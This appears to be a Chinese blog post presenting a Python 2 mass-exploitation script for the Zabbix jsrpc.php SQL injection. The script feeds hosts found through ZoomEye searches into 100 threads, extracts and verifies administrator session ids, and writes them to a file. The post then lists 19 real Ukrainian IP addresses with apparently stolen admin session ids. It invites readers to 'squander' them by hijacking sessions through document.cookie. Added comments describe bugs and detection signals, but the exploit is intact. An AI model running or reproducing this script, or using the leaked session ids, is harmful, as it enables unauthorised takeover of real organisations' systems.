借助zoomeye进行Zabbix管理员sessionid抓取

首先 贴一下Exp:

import threadpool
import os,re
import urllib,sys,urllib2,urllib
import socket
socket.setdefaulttimeout(30)  # every urllib/urllib2 socket below gives up after 30 s
# Regex run over the saved search-result HTML in re_ip(): captures the href of any
# <a> tag that carries the "hint--bottom" class. Presumably this matches the ZoomEye
# result-page markup the author saved; it is not a Zabbix artefact -- confirm against the files.
ip_tag = r'<a.*?hint\-\-bottom.*?href="(.*?)"'
# Path of the results file. Assigned from sys.argv[2] in __main__, read by t_p().
output_file = None
# Count of hosts processed so far. Incremented from worker threads in t_p() without a lock,
# so the printed value is only approximate.
cnt = 0
def cookie(url):
    """Probe one Zabbix base URL for a leaked admin session id.

    Sends a single GET to ``url + /jsrpc.php`` whose ``profileIdx2`` parameter carries a
    SQL subquery, then looks for a MySQL duplicate-key error echoed back in the body.
    Returns the substring the script takes as the session id, or ``None`` when the request
    fails or the error text is absent (e.g. the instance does not echo database errors).

    Detection note: the observable on the wire is a ``jsrpc.php`` GET whose ``profileIdx2``
    value contains SQL syntax, followed by a 200 response containing a database error string.
    """
    poc='/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select 1 from (select count(*),concat(floor(rand(0)*2), (select sessionid from sessions where userid=1 and status=0 limit 1))x from information_schema.character_sets group by x)y)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color='
    try:
        body= urllib.urlopen(url+poc).read()
    except:
        # Bare except: any failure (socket timeout, HTTP error, even KeyboardInterrupt)
        # is treated as "no session id".
        return None
    # Local name shadows the enclosing function; harmless here but easy to misread.
    cookie=body.split('Duplicate entry')
    if len(cookie) > 1:
        # Text between 'Duplicate entry' and 'for key', with 3 leading and 2 trailing
        # characters sliced off (the quoting around the value in the error message).
        cookie = cookie[1].split('for key')[0][3:-2]
    else:
        cookie = None
    return cookie
def test(cookie,url):
    """Check whether a harvested session id is accepted by the target.

    Appends ``proxies.php`` directly to ``url`` (no separator, so ``url`` must already end
    with ``/``) and requests it with a ``zbx_sessionid`` cookie. Returns ``cookie`` when the
    response does not contain ``Access denied.``; returns ``None`` for a ``None`` input, on
    any request failure, or when access is denied.

    Detection note: this is an authenticated request to ``proxies.php`` reusing a session id
    from a client that never logged in; session/IP binding or a fresh-login requirement on
    the Zabbix side would make it return ``None``.
    """
    if cookie is None:
        return
    url=url+'proxies.php'
    req=urllib2.Request(url)
    cook="zbx_sessionid=%s" % cookie
    req.add_header('Cookie', cook)
    try:
        response=urllib2.urlopen(req)
        data=response.read()
    except:
        # Bare except: every error, including KeyboardInterrupt, is swallowed.
        return
 
    # str.find() < 0 means the marker is absent.
    if data.find('Access denied.') < 0:
        return cookie
    else:
        return None
def re_ip(file):
    """Return every href captured by ``ip_tag`` from one saved HTML file.

    Returns an empty list when ``file`` does not exist. Despite the name, the values are
    whatever the anchor's href holds, not necessarily bare IP addresses.
    """
    # Parameter name shadows the builtin ``file``.
    if os.path.exists(file) == False:
        return []
    # Opened read/write binary although only a read is performed.
    f = open(file,'r+b')
    info = f.read()
    f.close()
    hosts = re.findall(ip_tag,info)
    return hosts
def capture_host(dir_path):
    """Collect the de-duplicated set of hrefs from every file under ``dir_path``.

    Returns an empty list when the directory does not exist. Order of the result is not
    preserved because the list is passed through ``set``.
    """
    all_host = list()
    if os.path.exists(dir_path):
        for p,d,s in os.walk(dir_path):
            for f in s:
                # Joins with dir_path rather than the walked directory ``p``, so a file
                # inside a subdirectory is looked up at the wrong path and re_ip() returns
                # [] for it; only top-level files contribute.
                c_p = os.path.join(dir_path,f)
                c_h = re_ip(c_p)
                all_host.extend(c_h)
    return list(set(all_host))          
def t_p(ip):
    """Thread-pool worker: probe one base URL and append a confirmed hit to ``output_file``.

    Runs ``cookie(ip)`` then ``test()``; when a session id is accepted, writes
    ``"<url> <sessionid>" + os.linesep`` to the global results file. Always increments
    the global ``cnt`` and prints it. Returns ``None``.
    """
    ret = test(cookie(ip),ip)
    if ret is not None:
        #print 'Found--->'+ip+' '+str(ret)
        global output_file
        # The file is reopened and appended from each worker thread with no lock;
        # concurrent writes may interleave.
        f = open(output_file,'a+b')
        f.write(ip+' '+str(ret)+os.linesep)
        f.close()
    global cnt
    # Unsynchronised read-modify-write across threads; the count is approximate.
    cnt += 1
    print cnt
if __name__ == '__main__':
    # Usage: python zabbix.py <directory of saved HTML pages> <results file>
    # argv is read without validation; a missing argument raises IndexError.
    inf = sys.argv[1]
    output_file = sys.argv[2]
    h_s = capture_host(inf)
    print len(h_s)
    r_h = list()  # unused
    # 100 concurrent workers, each issuing two HTTP requests per host via t_p().
    pool = threadpool.ThreadPool(100)
    requests = threadpool.makeRequests(t_p, h_s)
    # List comprehension used purely for its side effect of queueing each request.
    [pool.putRequest(req) for req in requests]
    pool.wait()
    print 'DOne'

把Zoomeye Zabbix的查询页面保存到一个文件夹里,记得保存时要保存所有页面。
然后执行 :
python zabbix.py 保存html的目录名 想要保存结果的文件

Done!
下面展示下乌克兰存在Zabbix Sqli的系统及管理sessionid,拿去随意挥霍吧:
(问我怎么挥霍?改登录页面cookie!
document.cookie = “zbx_sessionid=捕获的sessionid”

http://91.206.212.227:8080/ 055dca7e83903f1b69f452a154ef09b9
http://185.86.77.122/ 0e41db18294a0adec7284b991da6a7cb
http://171.25.175.67/ 02c43a0f838231adb05d955a932a4505
http://92.249.114.95/ 04b0fb8f88b2cdb3aacba527f128b2c4
http://91.209.24.4/ 0207a743a3e3180b894f9e91ac350a7a
http://213.160.154.14/ 0d53f71b01d609e687067ff146f30a85
http://217.77.221.237:8888/ 5b9ce69b0e56bc654662e2978d2283a0
http://193.34.172.134/ 469746715bf9b3c96e733993f8be34b4
http://46.172.71.146:82/ 05df4b5e6af1498cd1ac5f92c5222cbd
http://83.142.232.43/ 0000038ad556182db58a919a1b482622
http://94.158.80.46/ 09bb97782274e3df61af0a7ed0260318
http://91.209.24.3/ 0207a743a3e3180b894f9e91ac350a7a
http://185.46.188.22/ 3d12a4ba3467cb2af64c7a3476be5628
http://212.26.129.115:8080/ 08345539730cfcc08d90bc3c8d165718
http://194.8.145.83/ 006f26c73934db6f43d5f51a1963f86c
http://31.28.167.83/ c1c1b254abf47e15221ef2cd4be9fc5f
http://77.120.122.9/ 1d336b417920ddf72794a6e2c01f8d6f
http://77.120.123.13/ 2d8a354f49b228730b9d5589c846979e
http://91.199.93.162/ 0a77174837ef338a6f964c756fdd584e
